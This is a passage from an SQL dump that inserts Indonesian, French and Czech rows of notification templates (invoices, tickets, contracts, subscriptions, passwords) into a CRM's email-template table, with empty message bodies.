(1007, 'staff', 'reminder-email-staff', 'indonesia', 'Staff Reminder Email [indonesia]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1008, 'contract', 'contract-comment-to-client', 'indonesia', 'New Comment  (Sent to Customer Contacts) [indonesia]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1009, 'contract', 'contract-comment-to-admin', 'indonesia', 'New Comment (Sent to Staff)  [indonesia]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1010, 'subscriptions', 'send-subscription', 'indonesia', 'Send Subscription to Customer [indonesia]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1011, 'subscriptions', 'subscription-payment-failed', 'indonesia', 'Subscription Payment Failed [indonesia]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1012, 'subscriptions', 'subscription-canceled', 'indonesia', 'Subscription Canceled (Sent to customer primary contact) [indonesia]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1013, 'subscriptions', 'subscription-payment-succeeded', 'indonesia', 'Subscription Payment Succeeded (Sent to customer primary contact) [indonesia]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1014, 'contract', 'contract-expiration-to-staff', 'indonesia', 'Contract Expiration Reminder (Sent to Staff) [indonesia]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1015, 'gdpr', 'gdpr-removal-request', 'indonesia', 'Removal Request From Contact (Sent to administrators) [indonesia]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1016, 'gdpr', 'gdpr-removal-request-lead', 'indonesia', 'Removal Request From Lead (Sent to administrators) [indonesia]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1017, 'client', 'client-registration-confirmed', 'indonesia', 'Customer Registration Confirmed [indonesia]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1018, 'contract', 'contract-signed-to-staff', 'indonesia', 'Contract Signed (Sent to Staff) [indonesia]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1019, 'subscriptions', 'customer-subscribed-to-staff', 'indonesia', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [indonesia]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1020, 'client', 'contact-verification-email', 'indonesia', 'Email Verification (Sent to Contact After Registration) [indonesia]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1021, 'client', 'new-customer-profile-file-uploaded-to-staff', 'indonesia', 'New Customer Profile File(s) Uploaded (Sent to Staff) [indonesia]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1022, 'staff', 'event-notification-to-staff', 'indonesia', 'Event Notification (Calendar) [indonesia]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1023, 'subscriptions', 'subscription-payment-requires-action', 'indonesia', 'Credit Card Authorization Required - SCA [indonesia]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1024, 'invoice', 'invoice-due-notice', 'indonesia', 'Invoice Due Notice [indonesia]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1025, 'estimate_request', 'estimate-request-submitted-to-staff', 'indonesia', 'Estimate Request Submitted (Sent to Staff) [indonesia]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1026, 'estimate_request', 'estimate-request-assigned', 'indonesia', 'Estimate Request Assigned (Sent to Staff) [indonesia]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1027, 'estimate_request', 'estimate-request-received-to-user', 'indonesia', 'Estimate Request Received (Sent to User) [indonesia]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1028, 'client', 'new-client-created', 'french', 'New Contact Added/Registered (Welcome Email) [french]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1029, 'invoice', 'invoice-send-to-client', 'french', 'Send Invoice to Customer [french]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1030, 'ticket', 'new-ticket-opened-admin', 'french', 'New Ticket Opened (Opened by Staff, Sent to Customer) [french]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1031, 'ticket', 'ticket-reply', 'french', 'Ticket Reply (Sent to Customer) [french]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1032, 'ticket', 'ticket-autoresponse', 'french', 'New Ticket Opened - Autoresponse [french]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1033, 'invoice', 'invoice-payment-recorded', 'french', 'Invoice Payment Recorded (Sent to Customer) [french]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1034, 'invoice', 'invoice-overdue-notice', 'french', 'Invoice Overdue Notice [french]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1035, 'invoice', 'invoice-already-send', 'french', 'Invoice Already Sent to Customer [french]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1036, 'ticket', 'new-ticket-created-staff', 'french', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [french]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1037, 'estimate', 'estimate-send-to-client', 'french', 'Send Estimate to Customer [french]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1038, 'ticket', 'ticket-reply-to-admin', 'french', 'Ticket Reply (Sent to Staff) [french]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1039, 'estimate', 'estimate-already-send', 'french', 'Estimate Already Sent to Customer [french]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1040, 'contract', 'contract-expiration', 'french', 'Contract Expiration Reminder (Sent to Customer Contacts) [french]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1041, 'tasks', 'task-assigned', 'french', 'New Task Assigned (Sent to Staff) [french]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1042, 'tasks', 'task-added-as-follower', 'french', 'Staff Member Added as Follower on Task (Sent to Staff) [french]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1043, 'tasks', 'task-commented', 'french', 'New Comment on Task (Sent to Staff) [french]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1044, 'tasks', 'task-added-attachment', 'french', 'New Attachment(s) on Task (Sent to Staff) [french]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1045, 'estimate', 'estimate-declined-to-staff', 'french', 'Estimate Declined (Sent to Staff) [french]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1046, 'estimate', 'estimate-accepted-to-staff', 'french', 'Estimate Accepted (Sent to Staff) [french]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1047, 'proposals', 'proposal-client-accepted', 'french', 'Customer Action - Accepted (Sent to Staff) [french]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1048, 'proposals', 'proposal-send-to-customer', 'french', 'Send Proposal to Customer [french]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1049, 'proposals', 'proposal-client-declined', 'french', 'Customer Action - Declined (Sent to Staff) [french]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1050, 'proposals', 'proposal-client-thank-you', 'french', 'Thank You Email (Sent to Customer After Accept) [french]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1051, 'proposals', 'proposal-comment-to-client', 'french', 'New Comment  (Sent to Customer/Lead) [french]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1052, 'proposals', 'proposal-comment-to-admin', 'french', 'New Comment (Sent to Staff)  [french]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1053, 'estimate', 'estimate-thank-you-to-customer', 'french', 'Thank You Email (Sent to Customer After Accept) [french]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1054, 'tasks', 'task-deadline-notification', 'french', 'Task Deadline Reminder - Sent to Assigned Members [french]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1055, 'contract', 'send-contract', 'french', 'Send Contract to Customer [french]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1056, 'invoice', 'invoice-payment-recorded-to-staff', 'french', 'Invoice Payment Recorded (Sent to Staff) [french]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1057, 'ticket', 'auto-close-ticket', 'french', 'Auto Close Ticket [french]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1058, 'project', 'new-project-discussion-created-to-staff', 'french', 'New Project Discussion (Sent to Project Members) [french]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1059, 'project', 'new-project-discussion-created-to-customer', 'french', 'New Project Discussion (Sent to Customer Contacts) [french]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1060, 'project', 'new-project-file-uploaded-to-customer', 'french', 'New Project File(s) Uploaded (Sent to Customer Contacts) [french]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1061, 'project', 'new-project-file-uploaded-to-staff', 'french', 'New Project File(s) Uploaded (Sent to Project Members) [french]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1062, 'project', 'new-project-discussion-comment-to-customer', 'french', 'New Discussion Comment  (Sent to Customer Contacts) [french]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1063, 'project', 'new-project-discussion-comment-to-staff', 'french', 'New Discussion Comment (Sent to Project Members) [french]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1064, 'project', 'staff-added-as-project-member', 'french', 'Staff Added as Project Member [french]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1065, 'estimate', 'estimate-expiry-reminder', 'french', 'Estimate Expiration Reminder [french]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1066, 'proposals', 'proposal-expiry-reminder', 'french', 'Proposal Expiration Reminder [french]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1067, 'staff', 'new-staff-created', 'french', 'New Staff Created (Welcome Email) [french]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1068, 'client', 'contact-forgot-password', 'french', 'Forgot Password [french]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1069, 'client', 'contact-password-reseted', 'french', 'Password Reset - Confirmation [french]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1070, 'client', 'contact-set-password', 'french', 'Set New Password [french]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1071, 'staff', 'staff-forgot-password', 'french', 'Forgot Password [french]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1072, 'staff', 'staff-password-reseted', 'french', 'Password Reset - Confirmation [french]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1073, 'project', 'assigned-to-project', 'french', 'New Project Created (Sent to Customer Contacts) [french]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1074, 'tasks', 'task-added-attachment-to-contacts', 'french', 'New Attachment(s) on Task (Sent to Customer Contacts) [french]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1075, 'tasks', 'task-commented-to-contacts', 'french', 'New Comment on Task (Sent to Customer Contacts) [french]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1076, 'leads', 'new-lead-assigned', 'french', 'New Lead Assigned to Staff Member [french]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1077, 'client', 'client-statement', 'french', 'Statement - Account Summary [french]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1078, 'ticket', 'ticket-assigned-to-admin', 'french', 'New Ticket Assigned (Sent to Staff) [french]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1079, 'client', 'new-client-registered-to-admin', 'french', 'New Customer Registration (Sent to admins) [french]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1080, 'leads', 'new-web-to-lead-form-submitted', 'french', 'Web to lead form submitted - Sent to lead [french]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1081, 'staff', 'two-factor-authentication', 'french', 'Two Factor Authentication [french]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1082, 'project', 'project-finished-to-customer', 'french', 'Project Marked as Finished (Sent to Customer Contacts) [french]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1083, 'credit_note', 'credit-note-send-to-client', 'french', 'Send Credit Note To Email [french]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1084, 'tasks', 'task-status-change-to-staff', 'french', 'Task Status Changed (Sent to Staff) [french]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1085, 'tasks', 'task-status-change-to-contacts', 'french', 'Task Status Changed (Sent to Customer Contacts) [french]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1086, 'staff', 'reminder-email-staff', 'french', 'Staff Reminder Email [french]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1087, 'contract', 'contract-comment-to-client', 'french', 'New Comment  (Sent to Customer Contacts) [french]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1088, 'contract', 'contract-comment-to-admin', 'french', 'New Comment (Sent to Staff)  [french]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1089, 'subscriptions', 'send-subscription', 'french', 'Send Subscription to Customer [french]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1090, 'subscriptions', 'subscription-payment-failed', 'french', 'Subscription Payment Failed [french]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1091, 'subscriptions', 'subscription-canceled', 'french', 'Subscription Canceled (Sent to customer primary contact) [french]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1092, 'subscriptions', 'subscription-payment-succeeded', 'french', 'Subscription Payment Succeeded (Sent to customer primary contact) [french]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1093, 'contract', 'contract-expiration-to-staff', 'french', 'Contract Expiration Reminder (Sent to Staff) [french]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1094, 'gdpr', 'gdpr-removal-request', 'french', 'Removal Request From Contact (Sent to administrators) [french]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1095, 'gdpr', 'gdpr-removal-request-lead', 'french', 'Removal Request From Lead (Sent to administrators) [french]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1096, 'client', 'client-registration-confirmed', 'french', 'Customer Registration Confirmed [french]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(1097, 'contract', 'contract-signed-to-staff', 'french', 'Contract Signed (Sent to Staff) [french]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1098, 'subscriptions', 'customer-subscribed-to-staff', 'french', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [french]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1099, 'client', 'contact-verification-email', 'french', 'Email Verification (Sent to Contact After Registration) [french]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1100, 'client', 'new-customer-profile-file-uploaded-to-staff', 'french', 'New Customer Profile File(s) Uploaded (Sent to Staff) [french]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1101, 'staff', 'event-notification-to-staff', 'french', 'Event Notification (Calendar) [french]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1102, 'subscriptions', 'subscription-payment-requires-action', 'french', 'Credit Card Authorization Required - SCA [french]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1103, 'invoice', 'invoice-due-notice', 'french', 'Invoice Due Notice [french]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1104, 'estimate_request', 'estimate-request-submitted-to-staff', 'french', 'Estimate Request Submitted (Sent to Staff) [french]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1105, 'estimate_request', 'estimate-request-assigned', 'french', 'Estimate Request Assigned (Sent to Staff) [french]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1106, 'estimate_request', 'estimate-request-received-to-user', 'french', 'Estimate Request Received (Sent to User) [french]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1107, 'client', 'new-client-created', 'czech', 'New Contact Added/Registered (Welcome Email) [czech]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1108, 'invoice', 'invoice-send-to-client', 'czech', 'Send Invoice to Customer [czech]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1109, 'ticket', 'new-ticket-opened-admin', 'czech', 'New Ticket Opened (Opened by Staff, Sent to Customer) [czech]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1110, 'ticket', 'ticket-reply', 'czech', 'Ticket Reply (Sent to Customer) [czech]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1111, 'ticket', 'ticket-autoresponse', 'czech', 'New Ticket Opened - Autoresponse [czech]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1112, 'invoice', 'invoice-payment-recorded', 'czech', 'Invoice Payment Recorded (Sent to Customer) [czech]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1113, 'invoice', 'invoice-overdue-notice', 'czech', 'Invoice Overdue Notice [czech]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1114, 'invoice', 'invoice-already-send', 'czech', 'Invoice Already Sent to Customer [czech]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1115, 'ticket', 'new-ticket-created-staff', 'czech', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [czech]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1116, 'estimate', 'estimate-send-to-client', 'czech', 'Send Estimate to Customer [czech]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1117, 'ticket', 'ticket-reply-to-admin', 'czech', 'Ticket Reply (Sent to Staff) [czech]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1118, 'estimate', 'estimate-already-send', 'czech', 'Estimate Already Sent to Customer [czech]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1119, 'contract', 'contract-expiration', 'czech', 'Contract Expiration Reminder (Sent to Customer Contacts) [czech]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1120, 'tasks', 'task-assigned', 'czech', 'New Task Assigned (Sent to Staff) [czech]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1121, 'tasks', 'task-added-as-follower', 'czech', 'Staff Member Added as Follower on Task (Sent to Staff) [czech]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1122, 'tasks', 'task-commented', 'czech', 'New Comment on Task (Sent to Staff) [czech]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1123, 'tasks', 'task-added-attachment', 'czech', 'New Attachment(s) on Task (Sent to Staff) [czech]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1124, 'estimate', 'estimate-declined-to-staff', 'czech', 'Estimate Declined (Sent to Staff) [czech]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1125, 'estimate', 'estimate-accepted-to-staff', 'czech', 'Estimate Accepted (Sent to Staff) [czech]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1126, 'proposals', 'proposal-client-accepted', 'czech', 'Customer Action - Accepted (Sent to Staff) [czech]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1127, 'proposals', 'proposal-send-to-customer', 'czech', 'Send Proposal to Customer [czech]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1128, 'proposals', 'proposal-client-declined', 'czech', 'Customer Action - Declined (Sent to Staff) [czech]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1129, 'proposals', 'proposal-client-thank-you', 'czech', 'Thank You Email (Sent to Customer After Accept) [czech]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1130, 'proposals', 'proposal-comment-to-client', 'czech', 'New Comment  (Sent to Customer/Lead) [czech]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1131, 'proposals', 'proposal-comment-to-admin', 'czech', 'New Comment (Sent to Staff)  [czech]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1132, 'estimate', 'estimate-thank-you-to-customer', 'czech', 'Thank You Email (Sent to Customer After Accept) [czech]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1133, 'tasks', 'task-deadline-notification', 'czech', 'Task Deadline Reminder - Sent to Assigned Members [czech]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1134, 'contract', 'send-contract', 'czech', 'Send Contract to Customer [czech]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1135, 'invoice', 'invoice-payment-recorded-to-staff', 'czech', 'Invoice Payment Recorded (Sent to Staff) [czech]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1136, 'ticket', 'auto-close-ticket', 'czech', 'Auto Close Ticket [czech]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1137, 'project', 'new-project-discussion-created-to-staff', 'czech', 'New Project Discussion (Sent to Project Members) [czech]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1138, 'project', 'new-project-discussion-created-to-customer', 'czech', 'New Project Discussion (Sent to Customer Contacts) [czech]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1139, 'project', 'new-project-file-uploaded-to-customer', 'czech', 'New Project File(s) Uploaded (Sent to Customer Contacts) [czech]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1140, 'project', 'new-project-file-uploaded-to-staff', 'czech', 'New Project File(s) Uploaded (Sent to Project Members) [czech]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1141, 'project', 'new-project-discussion-comment-to-customer', 'czech', 'New Discussion Comment  (Sent to Customer Contacts) [czech]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1142, 'project', 'new-project-discussion-comment-to-staff', 'czech', 'New Discussion Comment (Sent to Project Members) [czech]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1143, 'project', 'staff-added-as-project-member', 'czech', 'Staff Added as Project Member [czech]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1144, 'estimate', 'estimate-expiry-reminder', 'czech', 'Estimate Expiration Reminder [czech]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1145, 'proposals', 'proposal-expiry-reminder', 'czech', 'Proposal Expiration Reminder [czech]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1146, 'staff', 'new-staff-created', 'czech', 'New Staff Created (Welcome Email) [czech]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1147, 'client', 'contact-forgot-password', 'czech', 'Forgot Password [czech]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1148, 'client', 'contact-password-reseted', 'czech', 'Password Reset - Confirmation [czech]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1149, 'client', 'contact-set-password', 'czech', 'Set New Password [czech]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1150, 'staff', 'staff-forgot-password', 'czech', 'Forgot Password [czech]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1151, 'staff', 'staff-password-reseted', 'czech', 'Password Reset - Confirmation [czech]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1152, 'project', 'assigned-to-project', 'czech', 'New Project Created (Sent to Customer Contacts) [czech]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1153, 'tasks', 'task-added-attachment-to-contacts', 'czech', 'New Attachment(s) on Task (Sent to Customer Contacts) [czech]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1154, 'tasks', 'task-commented-to-contacts', 'czech', 'New Comment on Task (Sent to Customer Contacts) [czech]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1155, 'leads', 'new-lead-assigned', 'czech', 'New Lead Assigned to Staff Member [czech]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1156, 'client', 'client-statement', 'czech', 'Statement - Account Summary [czech]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1157, 'ticket', 'ticket-assigned-to-admin', 'czech', 'New Ticket Assigned (Sent to Staff) [czech]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1158, 'client', 'new-client-registered-to-admin', 'czech', 'New Customer Registration (Sent to admins) [czech]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1159, 'leads', 'new-web-to-lead-form-submitted', 'czech', 'Web to lead form submitted - Sent to lead [czech]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1160, 'staff', 'two-factor-authentication', 'czech', 'Two Factor Authentication [czech]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1161, 'project', 'project-finished-to-customer', 'czech', 'Project Marked as Finished (Sent to Customer Contacts) [czech]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1162, 'credit_note', 'credit-note-send-to-client', 'czech', 'Send Credit Note To Email [czech]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1163, 'tasks', 'task-status-change-to-staff', 'czech', 'Task Status Changed (Sent to Staff) [czech]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1164, 'tasks', 'task-status-change-to-contacts', 'czech', 'Task Status Changed (Sent to Customer Contacts) [czech]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1165, 'staff', 'reminder-email-staff', 'czech', 'Staff Reminder Email [czech]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1166, 'contract', 'contract-comment-to-client', 'czech', 'New Comment  (Sent to Customer Contacts) [czech]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1167, 'contract', 'contract-comment-to-admin', 'czech', 'New Comment (Sent to Staff)  [czech]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1168, 'subscriptions', 'send-subscription', 'czech', 'Send Subscription to Customer [czech]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1169, 'subscriptions', 'subscription-payment-failed', 'czech', 'Subscription Payment Failed [czech]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1170, 'subscriptions', 'subscription-canceled', 'czech', 'Subscription Canceled (Sent to customer primary contact) [czech]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
